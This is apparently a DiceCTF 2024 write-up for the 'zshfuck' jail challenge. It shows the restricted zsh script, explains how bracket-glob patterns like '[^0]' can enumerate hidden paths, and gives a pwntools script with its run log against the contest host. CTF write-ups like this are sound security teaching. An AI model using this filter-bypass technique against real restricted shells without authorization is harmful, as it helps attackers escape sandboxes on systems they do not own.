DiceCTF 2024 zshfuck writeup.md

DiceCTF 2024 — zshfuck

may your code be under par. execute the getflag binary somewhere in the filesystem to win

nc mc.ax 31774

We're given a zsh script that looks like this:

#!/bin/zsh
print -n -P "%F{green}Specify your charset: %f"
read -r charset
# get uniq characters in charset
charset=("${(us..)charset}")
banned=('*' '?' '`')

if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then
    print -P "\n%F{red}That's too easy. Sorry.%f\n"
    exit 1
fi
print -P "\n%F{green}OK! Got $charset.%f"
charset+=($'\n')

# start jail via coproc
coproc zsh -s
exec 3>&p 4<&p

# read chars from fd 4 (jail stdout), print to stdout
while IFS= read -u4 -r -k1 char; do
    print -u1 -n -- "$char"
done &
# read chars from stdin, send to jail stdin if valid
while IFS= read -u0 -r -k1 char; do
    if [[ ! ${#char:|charset} -eq 0 ]]; then
        print -P "\n%F{red}Nope.%f\n"
        exit 1
    fi
    # send to fd 3 (jail stdin)
    print -u3 -n -- "$char"
done

We're asked for a "charset" of 6 unique characters, and given a shell where only those characters are allowed. *, ?, and ` are banned.

The key here is that we can use pattern matching with brackets to match characters one at a time. The directory the shell starts in contains

/app
 |--- run  (the jail shell script)
 |--- y0u  (the directory you want to search in)

which are both 3 characters long, so choose the character set

.[^0]/

and use 0 and [^0] to distinguish between the two.

Then, keep adding [^0]s to match characters, checking the return message in the shell to determine when to add a / to move down a directory:

Heres a Python script to automate just that:

import pwn

charset = b'.[^0]/\n'
cmd = './[^0]0[^0]/[^0][^0][^0][^0]/'

while True:
    conn = pwn.remote('mc.ax', 31774)

    conn.recv(numb=27)
    conn.send(charset)
    conn.recvline()
    conn.recvline()

    cmd += '[^0]'
    conn.send((cmd + '\n').encode())

    ret = conn.recvline().decode('utf8')
    print(ret)
    if ret.startswith('dice'):
        break
    elif not ret.startswith('zsh: no matches found:'):
        cmd += '/'

    conn.close()

[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: permission denied: ./y0u/w1ll/n3v3r_g3t

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: permission denied: ./y0u/w1ll/n3v3r_g3t/th1s

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]

[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}

[*] Closed connection to mc.ax port 31774